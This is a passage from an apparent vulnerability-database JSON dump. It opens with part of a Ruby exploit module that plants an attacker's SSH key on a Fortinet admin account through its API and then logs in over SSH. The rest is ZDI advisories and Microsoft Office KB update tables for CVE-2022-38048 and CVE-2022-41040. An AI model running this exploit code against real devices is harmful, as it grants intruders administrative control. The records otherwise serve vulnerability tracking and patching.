'admin' : users.sample\n else\n vprint_status(\"PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, we will get a random that is not the admin.\")\n (users - ['admin']).sample\n end\n end\n\n def add_ssh_key\n if current_keys.include?(authorized_keys)\n # then we'll remove that on cleanup\n print_good('Your key is already in the authorized_keys file')\n return\n end\n vprint_status('Adding SSH key to authorized_keys file')\n # Adding the SSH key as the last entry in the authorized_keys file\n keystoadd = current_keys.first(2) + [authorized_keys]\n data = keystoadd.map.with_index { |key, idx| [\"ssh-public-key#{idx + 1}\", \"\\\"#{key}\\\"\"] }.to_h\n\n res = fortinet_request({\n 'method' => 'PUT',\n 'uri' => normalize_uri(target_uri.path, '/system/admin/', username),\n 'data' => data.to_json\n })\n fail_with(Failure::UnexpectedReply, 'Failed to add SSH key to authorized_keys file.') unless res&.code == 500\n body = res.get_json_document\n fail_with(Failure::UnexpectedReply, 'Unexpected reponse from the server after adding the key.') unless body.key?('cli_error') && body['cli_error'] =~ /SSH key is good/\n end\n\n def read_keys\n vprint_status('Reading SSH key from authorized_keys file')\n res = fortinet_request({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/system/admin/', username)\n })\n fail_with(Failure::UnexpectedReply, 'Failed read current SSH keys') unless res&.code == 200\n result = res.get_json_document['results'].first\n ['ssh-public-key1', 'ssh-public-key2', 'ssh-public-key3'].map do |key|\n result[key].gsub('\"', '') unless result[key].empty?\n end.compact\n end\n\n def do_login(ssh_options)\n # ensure we don't have a stale socket hanging around\n ssh_options[:proxy].proxies = nil if ssh_options[:proxy]\n begin\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\n self.ssh_socket = Net::SSH.start(rhost, username, ssh_options)\n end\n rescue Rex::ConnectionError\n fail_with(Failure::Unreachable, 'Disconnected during negotiation')\n rescue 
Net::SSH::Disconnect, ::EOFError\n fail_with(Failure::Disconnected, 'Timed out during negotiation')\n rescue Net::SSH::AuthenticationFailed\n fail_with(Failure::NoAccess, 'Failed authentication')\n rescue Net::SSH::Exception => e\n fail_with(Failure::Unknown, \"SSH Error: #{e.class} : #{e.message}\")\n end\n\n fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket\n end\n\n def exploit\n print_status(\"Executing exploit on #{datastore['RHOST']}:#{datastore['RPORT']} target user: #{username}\")\n add_ssh_key\n vprint_status('Establishing SSH connection')\n ssh_options = ssh_client_defaults.merge({\n auth_methods: ['publickey'],\n key_data: [ ssh_private_key ],\n port: ssh_rport\n })\n ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']\n\n do_login(ssh_options)\n\n handler(ssh_socket)\n end\nend\n", "sourceHref": "https://0day.today/exploit/38045", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdi": [{"lastseen": "2022-10-14T11:55:54", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Word. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DOCX files. Crafted data in a DOCX file can cause a pointer to be reused after it has been freed. 
An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-14T00:00:00", "type": "zdi", "title": "Microsoft Word DOCX File Parsing Use-After-Free Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-38048"], "modified": "2022-10-14T00:00:00", "id": "ZDI-22-1411", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-1411/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-18T23:27:59", "description": "This vulnerability allows remote attackers to escalate privileges on affected installations of Microsoft Exchange. Authentication is required to exploit this vulnerability. The specific flaw exists within the Autodiscover service. The issue results from the lack of proper validation of a URI prior to accessing resources. 
An attacker can leverage this vulnerability to escalate privileges to resources normally protected from the user.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-17T00:00:00", "type": "zdi", "title": "Microsoft Exchange Autodiscover Server-Side Request Forgery Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-11-18T00:00:00", "id": "ZDI-22-1595", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-1595/", "cvss": {"score": 0.0, "vector": "NONE"}}], "mskb": [{"lastseen": "2023-01-13T10:49:34", "description": "None\n## Summary\n\nThis security update resolves a Microsoft Office remote code execution vulnerability. To learn more about the vulnerability, see [Microsoft Common Vulnerabilities and Exposures CVE-2022-38048](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-38048>).\n\n**Note: **To apply this security update, you must have the release version of Microsoft Office 2016 installed on the computer.\n\nBe aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2016. It doesn't apply to the Office 2016 Click-to-Run editions, such as Microsoft Office 365 Home. (See [What version of Office am I using?](<https://support.office.com/article/About-Office-What-version-of-Office-am-I-using-932788B8-A3CE-44BF-BB09-E334518B8B19>))\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. 
When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB5002026>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update 5002026 for the 32-bit version of Office 2016](<http://www.microsoft.com/download/details.aspx?familyid=ae76574f-1853-4d53-98bb-1fcc83a2649b>)\n * [Download security update 5002026 for the 64-bit version of Office 2016](<http://www.microsoft.com/download/details.aspx?familyid=1a5f8dc8-907a-4cf9-a4c7-80978a82413e>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see [Deployments - Security Update Guide](<https://msrc.microsoft.com/update-guide/deployments>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [3115103](<https://support.microsoft.com/kb/3115103>).\n\n### File hash information\n\nFile name| SHA256 hash \n---|--- \nmsodll40ui2016-kb5002026-fullfile-x86-glb.exe| 134F56F26B451B0ECBCC316B140847246060DB295DBE17FC0EC53BACF13C3E53 \nmsodll40ui2016-kb5002026-fullfile-x64-glb.exe| 35151642D208D164B0C018B8BC627D065EB70EAAAA174AD503A5818C1D45AD9D \n \n### File information\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). 
The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n#### For all supported x86-based versions of Office 2016\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nmso40uires.dll| mso40uires.dll| 16.0.4684.1000| 3203824| 13-Sep-22| 06:01 \nmso40uires.dll.x86| mso40uires.dll| 16.0.4684.1000| 3203824| 13-Sep-22| 05:57 \nmso40uiwin32client.dll.x64| mso40uiwin32client.dll| 16.0.5365.1000| 9361808| 15-Sep-22| 04:45 \nmso40uiwin32client.dll.x86| mso40uiwin32client.dll| 16.0.5365.1000| 7435176| 15-Sep-22| 04:48 \n \n#### For all supported x64-based versions of Office 2016\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nconversion.office.mso40uires.dll| mso40uires.dll| 16.0.4666.1000| 3203816| | \nmso40uires.dll| mso40uires.dll| 16.0.4666.1000| 3203816| 13-Sep-22| 05:47 \nppt.conversion.mso40uires.dll| mso40uires.dll| 16.0.4666.1000| 3203816| | \nppt.edit.mso40uires.dll| mso40uires.dll| 16.0.4666.1000| 3203816| | \nwac.office.mso40uires.dll| mso40uires.dll| 16.0.4666.1000| 3203816| | \nmso40uires.dll| mso40uires.dll| 16.0.4684.1000| 3203824| 13-Sep-22| 05:47 \nmso40uires.dll.x86| mso40uires.dll| 16.0.4684.1000| 3203824| 13-Sep-22| 05:57 \nmso40uiwin32client.dll.x64| mso40uiwin32client.dll| 16.0.5365.1000| 9361808| 15-Sep-22| 04:45 \nmso40uiwin32client.dll.x86| mso40uiwin32client.dll| 16.0.5365.1000| 7435176| 15-Sep-22| 04:48 \n \n## Information about protection and security\n\nProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)\n\nLearn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": 
"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-11T07:00:00", "type": "mskb", "title": "Description of the security update for Office 2016: October 11, 2022 (KB5002026)", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-38048"], "modified": "2022-10-11T07:00:00", "id": "KB5002026", "href": "https://support.microsoft.com/en-us/help/5002026", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-13T10:51:36", "description": "None\n## Summary\n\nThis security update resolves a Microsoft Office remote code execution vulnerability. To learn more about the vulnerability, see [Microsoft Common Vulnerabilities and Exposures CVE-2022-38048](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-38048>).\n\n**Note: **To apply this security update, you must have the release version of [Service Pack 1 for Microsoft Office 2013](<https://support.microsoft.com/kb/2817430>) installed on the computer.\n\nBe aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2013. It doesn't apply to the Office 2013 Click-to-Run editions, such as Microsoft Office 365 Home. (See [What version of Office am I using?](<https://support.office.com/article/About-Office-What-version-of-Office-am-I-using-932788B8-A3CE-44BF-BB09-E334518B8B19>))\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. 
For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB5002279>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update 5002279 for the 32-bit version of Office 2013](<http://www.microsoft.com/download/details.aspx?familyid=7bc9675d-6308-4f68-bfc5-c1b222ddd851>)\n * [Download security update 5002279 for the 64-bit version of Office 2013](<http://www.microsoft.com/download/details.aspx?familyid=1d37961b-9103-4e81-92ef-5fcb97553993>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see [Deployments - Security Update Guide](<https://msrc.microsoft.com/update-guide/deployments>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [5002166](<https://support.microsoft.com/kb/5002166>).\n\n### File hash information\n\nFile name| SHA256 hash \n---|--- \nmso2013-kb5002279-fullfile-x86-glb.exe| 9E653EAA94B31D6C766709D7D43671FA84BBD8B296842006BEF7AA6C3B391E72 \nmso2013-kb5002279-fullfile-x64-glb.exe| 9EF84B2A47050C3B2F0887F81F168BC5726FFE65813A1F23E2871516A20C1228 \n \n### File information\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). 
The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n#### For all supported x86-based versions of Office 2013\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nfirstrun.exe| firstrun.exe| 15.0.5337.1000| 991624| 14-Sep-22| 01:05 \nmsointl.dll.x86.1025| msointl.dll| 15.0.5153.1000| 4330064| 15-Sep-22| 09:15 \nmsointl.dll.x86.1026| msointl.dll| 15.0.5153.1000| 3243088| 15-Sep-22| 09:15 \nmsointl.dll.x86.1027| msointl.dll| 15.0.5153.1000| 3237160| 15-Sep-22| 09:15 \nmsointl.dll.x86.1029| msointl.dll| 15.0.5153.1000| 3237968| 15-Sep-22| 09:15 \nmsointl.dll.x86.1030| msointl.dll| 15.0.5153.1000| 2988112| 15-Sep-22| 09:15 \nmsointl.dll.x86.1031| msointl.dll| 15.0.5153.1000| 3183696| 15-Sep-22| 09:14 \nmsointl.dll.x86.1032| msointl.dll| 15.0.5153.1000| 3605584| 15-Sep-22| 09:15 \nmsointl.dll.x86.3082| msointl.dll| 15.0.5153.1000| 3212368| 15-Sep-22| 09:14 \nmsointl.dll.x86.1061| msointl.dll| 15.0.5153.1000| 3000912| 15-Sep-22| 09:15 \nmsointl.dll.x86.1069| msointl.dll| 15.0.5153.1000| 3093072| 15-Sep-22| 09:15 \nmsointl.dll.x86.1035| msointl.dll| 15.0.5153.1000| 3016272| 15-Sep-22| 09:15 \nmsointl.dll.x86.1036| msointl.dll| 15.0.5153.1000| 3871312| 15-Sep-22| 09:14 \nmsointl.dll.x86.1110| msointl.dll| 15.0.5153.1000| 3151952| 15-Sep-22| 09:15 \nmsointl.dll.x86.1095| msointl.dll| 15.0.5153.1000| 3019344| 15-Sep-22| 09:15 \nmsointl.dll.x86.1037| msointl.dll| 15.0.5153.1000| 4118096| 15-Sep-22| 09:15 \nmsointl.dll.x86.1081| msointl.dll| 15.0.5153.1000| 3093072| 15-Sep-22| 09:15 \nmsointl.dll.x86.1050| msointl.dll| 15.0.5377.1000| 3096992| 15-Sep-22| 09:15 \nmsointl.dll.x86.1038| msointl.dll| 15.0.5153.1000| 3294288| 15-Sep-22| 09:15 \nmsointl.dll.x86.1057| msointl.dll| 15.0.5153.1000| 2812712| 15-Sep-22| 09:15 
\nmsointl.dll.x86.1040| msointl.dll| 15.0.5153.1000| 3130448| 15-Sep-22| 09:14 \nmsointl.dll.x86.1041| msointl.dll| 15.0.5153.1000| 3093072| 15-Sep-22| 09:14 \nmsointl.dll.x86.1087| msointl.dll| 15.0.5153.1000| 3288656| 15-Sep-22| 09:15 \nmsointl.dll.x86.1099| msointl.dll| 15.0.5153.1000| 3162704| 15-Sep-22| 09:15 \nmsointl.dll.x86.1042| msointl.dll| 15.0.5153.1000| 3764304| 15-Sep-22| 09:14 \nmsointl.dll.x86.1063| msointl.dll| 15.0.5153.1000| 3245136| 15-Sep-22| 09:15 \nmsointl.dll.x86.1062| msointl.dll| 15.0.5153.1000| 3211344| 15-Sep-22| 09:15 \nmsointl.dll.x86.1086| msointl.dll| 15.0.5153.1000| 2831440| 15-Sep-22| 09:15 \nmsointl.dll.x86.1044| msointl.dll| 15.0.5153.1000| 2937936| 15-Sep-22| 09:15 \nmsointl.dll.x86.1043| msointl.dll| 15.0.5153.1000| 3098704| 15-Sep-22| 09:15 \nmsointl.dll.x86.1045| msointl.dll| 15.0.5153.1000| 3326032| 15-Sep-22| 09:15 \nmsointl.dll.x86.1046| msointl.dll| 15.0.5153.1000| 3130960| 15-Sep-22| 09:15 \nmsointl.dll.x86.2070| msointl.dll| 15.0.5153.1000| 3155536| 15-Sep-22| 09:15 \nmsointl.dll.x86.1048| msointl.dll| 15.0.5153.1000| 3270736| 15-Sep-22| 09:15 \nmsointl.dll.x86.1049| msointl.dll| 15.0.5153.1000| 3285584| 15-Sep-22| 09:15 \nmsointl.dll.x86.1051| msointl.dll| 15.0.5153.1000| 3285584| 15-Sep-22| 09:15 \nmsointl.dll.x86.1060| msointl.dll| 15.0.5153.1000| 3099432| 15-Sep-22| 09:15 \nmsointl.dll.x86.2074| msointl.dll| 15.0.5153.1000| 3141200| 15-Sep-22| 09:15 \nmsointl.dll.x86.1053| msointl.dll| 15.0.5153.1000| 2985552| 15-Sep-22| 09:15 \nmsointl.dll.x86.1054| msointl.dll| 15.0.5153.1000| 2932816| 15-Sep-22| 09:15 \nmsointl.dll.x86.1055| msointl.dll| 15.0.5153.1000| 3155024| 15-Sep-22| 09:15 \nmsointl.dll.x86.1058| msointl.dll| 15.0.5153.1000| 3265616| 15-Sep-22| 09:15 \nmsointl.dll.x86.1066| msointl.dll| 15.0.5153.1000| 3275344| 15-Sep-22| 09:15 \nmsointl.dll.x86.2052| msointl.dll| 15.0.5153.1000| 3110184| 15-Sep-22| 09:14 \nmsointl.dll.x86.1028| msointl.dll| 15.0.5153.1000| 3182672| 15-Sep-22| 09:14 \nmsointl.dll.x86.1033| 
msointl.dll| 15.0.5153.1000| 3819088| 14-Sep-22| 01:05 \nacmcompanion.mso.dll| mso.dll| 15.0.5493.1000| 26949048| | \nmso.dll.x86| mso.dll| 15.0.5493.1000| 26949048| 14-Sep-22| 01:05 \nmsores.dll| msores.dll| 15.0.5241.1000| 135069576| 14-Sep-22| 01:05 \nmsores.dll.x86| msores.dll| 15.0.5241.1000| 135069576| 14-Sep-22| 01:07 \nacmserver.office.dll| office.dll| 15.0.5493.1000| 460736| 14-Sep-22| 01:05 \ndcfoffice.dll| office.dll| 15.0.5493.1000| 460736| 14-Sep-22| 01:05 \ndcfoffice.dll.x86| office.dll| 15.0.5493.1000| 460736| 14-Sep-22| 01:05 \noffice.dll| office.dll| 15.0.5493.1000| 460736| 14-Sep-22| 01:05 \nmsosqm.exe| msosqm.exe| 15.0.5337.1000| 552328| 14-Sep-22| 01:05 \nmsointl.dll.idx_dll.x86.1025| msointl.dll.idx_dll| 15.0.4420.1017| 52336| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1025| msointl.rest.idx_dll| 15.0.4859.1000| 1499848| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1026| msointl.dll.idx_dll| 15.0.4460.1000| 53312| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1026| msointl.rest.idx_dll| 15.0.4859.1000| 1503424| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1027| msointl.dll.idx_dll| 15.0.4442.1000| 52848| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1027| msointl.rest.idx_dll| 15.0.4853.1000| 1476800| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1029| msointl.dll.idx_dll| 15.0.4454.1000| 52800| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1029| msointl.rest.idx_dll| 15.0.4859.1000| 1468608| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1030| msointl.dll.idx_dll| 15.0.4442.1000| 52336| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1030| msointl.rest.idx_dll| 15.0.5015.1000| 1464496| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1031| msointl.dll.idx_dll| 15.0.4420.1017| 52864| 15-Sep-22| 09:14 \nmsointl.rest.idx_dll.x86.1031| msointl.rest.idx_dll| 15.0.4989.1000| 1470640| 15-Sep-22| 09:14 \nmsointl.dll.idx_dll.x86.1032| msointl.dll.idx_dll| 15.0.4448.1000| 52800| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1032| msointl.rest.idx_dll| 15.0.4859.1000| 1476288| 
15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1033| msointl.rest.idx_dll| 15.0.4853.1000| 1493760| 14-Sep-22| 01:05 \nmsointl.rest.idx_dll.x86.3082| msointl.rest.idx_dll| 15.0.4859.1000| 1479360| 15-Sep-22| 09:14 \nmsointl.dll.idx_dll.x86.1061| msointl.dll.idx_dll| 15.0.4463.1000| 52816| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1061| msointl.rest.idx_dll| 15.0.5007.1000| 1475248| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1069| msointl.dll.idx_dll| 15.0.4442.1000| 52352| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1069| msointl.rest.idx_dll| 15.0.4853.1000| 1476800| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1035| msointl.dll.idx_dll| 15.0.4445.1000| 52800| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1035| msointl.rest.idx_dll| 15.0.4945.1000| 1465032| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1036| msointl.rest.idx_dll| 15.0.5015.1000| 1476784| 15-Sep-22| 09:14 \nmsointl.dll.idx_dll.x86.1110| msointl.dll.idx_dll| 15.0.4442.1000| 52336| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1110| msointl.rest.idx_dll| 15.0.4853.1000| 1480384| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1095| msointl.dll.idx_dll| 15.0.4527.1000| 52392| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1095| msointl.rest.idx_dll| 15.0.4853.1000| 1488072| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1037| msointl.dll.idx_dll| 15.0.4420.1017| 52864| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1037| msointl.rest.idx_dll| 15.0.4859.1000| 1483968| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1081| msointl.dll.idx_dll| 15.0.4442.1000| 52336| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1081| msointl.rest.idx_dll| 15.0.4859.1000| 1499328| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1050| msointl.dll.idx_dll| 15.0.4460.1000| 53328| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1050| msointl.rest.idx_dll| 15.0.5377.1000| 1501080| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1038| msointl.dll.idx_dll| 15.0.4448.1000| 52800| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1038| msointl.rest.idx_dll| 15.0.4859.1000| 
1462984| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1057| msointl.dll.idx_dll| 15.0.4469.1000| 52800| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1057| msointl.rest.idx_dll| 15.0.4859.1000| 1493184| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1040| msointl.dll.idx_dll| 15.0.4420.1017| 52336| 15-Sep-22| 09:14 \nmsointl.rest.idx_dll.x86.1040| msointl.rest.idx_dll| 15.0.4859.1000| 1454272| 15-Sep-22| 09:14 \nmsointl.rest.idx_dll.x86.1041| msointl.rest.idx_dll| 15.0.4859.1000| 1486024| 15-Sep-22| 09:14 \nmsointl.dll.idx_dll.x86.1087| msointl.dll.idx_dll| 15.0.4460.1000| 52288| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1087| msointl.rest.idx_dll| 15.0.4859.1000| 1472704| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1099| msointl.dll.idx_dll| 15.0.4487.1000| 52816| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1099| msointl.rest.idx_dll| 15.0.4853.1000| 1510592| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1042| msointl.dll.idx_dll| 15.0.4420.1017| 51840| 15-Sep-22| 09:14 \nmsointl.rest.idx_dll.x86.1042| msointl.rest.idx_dll| 15.0.5007.1000| 1436336| 15-Sep-22| 09:14 \nmsointl.dll.idx_dll.x86.1063| msointl.dll.idx_dll| 15.0.4463.1000| 52800| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1063| msointl.rest.idx_dll| 15.0.4859.1000| 1493696| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1062| msointl.dll.idx_dll| 15.0.4463.1000| 53328| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1062| msointl.rest.idx_dll| 15.0.4859.1000| 1495744| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1086| msointl.dll.idx_dll| 15.0.4469.1000| 52288| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1086| msointl.rest.idx_dll| 15.0.4859.1000| 1492680| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1044| msointl.dll.idx_dll| 15.0.4442.1000| 52352| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1044| msointl.rest.idx_dll| 15.0.4859.1000| 1460936| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1043| msointl.dll.idx_dll| 15.0.4420.1017| 52352| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1043| msointl.rest.idx_dll| 15.0.4989.1000| 
1467048| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1045| msointl.dll.idx_dll| 15.0.4442.1000| 52848| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1045| msointl.rest.idx_dll| 15.0.4859.1000| 1482944| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1046| msointl.dll.idx_dll| 15.0.4420.1017| 53360| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1046| msointl.rest.idx_dll| 15.0.4859.1000| 1510088| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.2070| msointl.dll.idx_dll| 15.0.4569.1501| 52904| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.2070| msointl.rest.idx_dll| 15.0.4859.1000| 1514688| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1048| msointl.dll.idx_dll| 15.0.4448.1000| 52816| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1048| msointl.rest.idx_dll| 15.0.4859.1000| 1476808| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1049| msointl.dll.idx_dll| 15.0.4420.1017| 52848| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1049| msointl.rest.idx_dll| 15.0.4885.1000| 1469120| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1051| msointl.dll.idx_dll| 15.0.4885.1000| 62656| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1051| msointl.rest.idx_dll| 15.0.4859.1000| 1482944| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1060| msointl.dll.idx_dll| 15.0.4466.1000| 52816| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1060| msointl.rest.idx_dll| 15.0.4859.1000| 1484488| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.2074| msointl.dll.idx_dll| 15.0.4460.1000| 53312| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.2074| msointl.rest.idx_dll| 15.0.4945.1000| 1501376| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1053| msointl.dll.idx_dll| 15.0.4442.1000| 52352| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1053| msointl.rest.idx_dll| 15.0.5031.1000| 1461936| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1054| msointl.dll.idx_dll| 15.0.4448.1000| 52288| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1054| msointl.rest.idx_dll| 15.0.4893.1000| 1450176| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1055| msointl.dll.idx_dll| 15.0.4448.1000| 
52800| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1055| msointl.rest.idx_dll| 15.0.4859.1000| 1483968| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1058| msointl.dll.idx_dll| 15.0.4454.1000| 53312| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1058| msointl.rest.idx_dll| 15.0.4859.1000| 1486016| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.1066| msointl.dll.idx_dll| 15.0.4481.1000| 52800| 15-Sep-22| 09:15 \nmsointl.rest.idx_dll.x86.1066| msointl.rest.idx_dll| 15.0.4859.1000| 1525448| 15-Sep-22| 09:15 \nmsointl.dll.idx_dll.x86.2052| msointl.dll.idx_dll| 15.0.4420.1017| 52336| 15-Sep-22| 09:14 \nmsointl.rest.idx_dll.x86.2052| msointl.rest.idx_dll| 15.0.4997.1000| 1464496| 15-Sep-22| 09:14 \nmsointl.dll.idx_dll.x86.1028| msointl.dll.idx_dll| 15.0.4420.1017| 51840| 15-Sep-22| 09:14 \nmsointl.rest.idx_dll.x86.1028| msointl.rest.idx_dll| 15.0.4997.1000| 1448112| 15-Sep-22| 09:14 \nfirstrun.veman.xml| firstrun.visualelementsmanifest.xml| | 344| 14-Sep-22| 01:05 \nexcellogo.contrastblack_scale100.png| excellogo.contrast-black_scale-100.png| | 1657| 14-Sep-22| 01:05 \nexcellogo.contrastblack_scale140.png| 